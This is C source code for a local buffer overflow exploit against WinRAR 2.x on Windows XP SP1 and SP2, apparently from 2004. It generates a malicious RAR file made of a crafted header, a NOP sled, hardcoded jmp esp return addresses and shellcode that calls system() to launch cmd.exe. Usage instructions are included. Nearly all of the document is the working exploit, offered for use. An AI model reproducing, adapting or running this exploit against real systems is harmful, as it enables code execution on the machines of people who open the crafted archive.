WinRAR 1.0 Local Buffer Overflow Exploit

/* * WinRar local buffer overflow exploit V1.0 * Coded By ATmaCA * Copyright ? 2004 ProGroup Software, Inc. * E-Mail:atmaca@prohack.net * Web:www.prohack.net * Usage:\\r\\nexploit <Target> <OutputPath> * Targets: * 1 - WinXP SP1 user32.dll [0x77D718FC] * 2 - WinXP SP2 user32.dll [0x77D8AF0A] * Example:exploit 1 myrar.rar */ /* * All WinRar 2.x series are effected * 3.x series not effected * If you want to test and you do not have WinRar V2.x * You can download it from http://atmaca.prorat.net/Src/winrar.zip */ #include <stdio.h> #include <stdlib.h> #include <conio.h> #ifdef __BORLANDC__ #include <mem.h> #endif #define NOP 0x90 /*crafted rar header*/ char winrar_header[] = \"\\x52\\x61\\x72\\x21\\x1A\\x07\\x00\\xCF\\x90\\x73\\x00\\x00\\x0D\\x00\\x00\\x00\" \"\\x00\\x00\\x00\\x00\\x4A\\x91\\x74\\x80\\x80\\x35\\x00\\x00\\x00\\x00\\x00\\x00\" \"\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x12\"; /*launch a local cmd.exe*/ char shellcode[]= \"\\x68\" // push \"cmd \" // cmd \"\\x8B\\xC4\" // mov eax,esp \"\\x50\" // push eax \"\\xB8\\xc7\\x93\\xC2\\x77\" // mov eax,77C293C7 (address of system() on WinXP SP2 - msvcrt.dll) \"\\xFF\\xD0\" // call eax ; char *target[]= //return addr { \"\\xFC\\x18\\xD7\\x77\", //User32 jmp esp addr WinXp Sp1 \"\\x0A\\xAF\\xD8\\x77\" //User32 jmp esp addr WinXp Sp2 }; char *sysadrr[]= { \"\\x44\\x80\\xC2\\x77\", //77C28044 XP Sp1 msvcrt.dll system() \"\\xC7\\x93\\xC2\\x77\" //77C293C7 XP Sp2 msvcrt.dll system() }; FILE *di; int targetnum; int i; void main(int argc, char *argv[]) { if (argc < 3) { printf(\"\\r\\nWinRar local buffer overflow exploit V1.0\\r\\n\", argv[0]); printf(\"Coded By ATmaCA\\r\\n\"); printf(\"Copyright ? 2004 ProGroup Software, Inc.\\r\\n\"); printf(\"E-Mail:atmaca@prohack.net\\r\\n\"); printf(\"Web:www.prohack.net\\r\\n\\r\\n\"); printf(\"Usage:\\r\\nexploit <Target> <OutputPath>\\r\\n\\r\\n\",argv[0]); printf(\"Targets:\\n\"); printf(\"1 - WinXP SP1 english user32.dll [0x77D718FC]\\n\"); printf(\"2 - WinXP SP2 english user32.dll [0x77D8AF0A]\\n\"); printf(\"Example:exploit 1 myrar.rar\\n\"); return; } targetnum = atoi(argv[1]) - 1; if( (di=fopen(argv[2],\"wb\")) == NULL ) { printf(\"Error opening file!\\n\"); return; } for(i=0;i<sizeof(winrar_header)-1;i++) fputc(winrar_header[i],di); /*stuff in a couple of NOPs*/ for(i=0;i<1051;i++) fputc(NOP,di); fprintf(di,\"%s\",target[targetnum]); //EIP for(i=0;i<50;i++) //NOPs fputc(NOP,di); memcpy(shellcode+9,sysadrr[targetnum],4); //system() addr /*Overwriting the return address (EIP) with JMP ESP address located somewhere in process space */ for(i=0;i<sizeof(shellcode)-1;i++) fputc(shellcode[i],di); for(i=0;i<50;i++) //NOPs fputc(NOP,di); printf(\"Exploit rar file %s has been generated!\\n\",argv[2]); fclose(di); }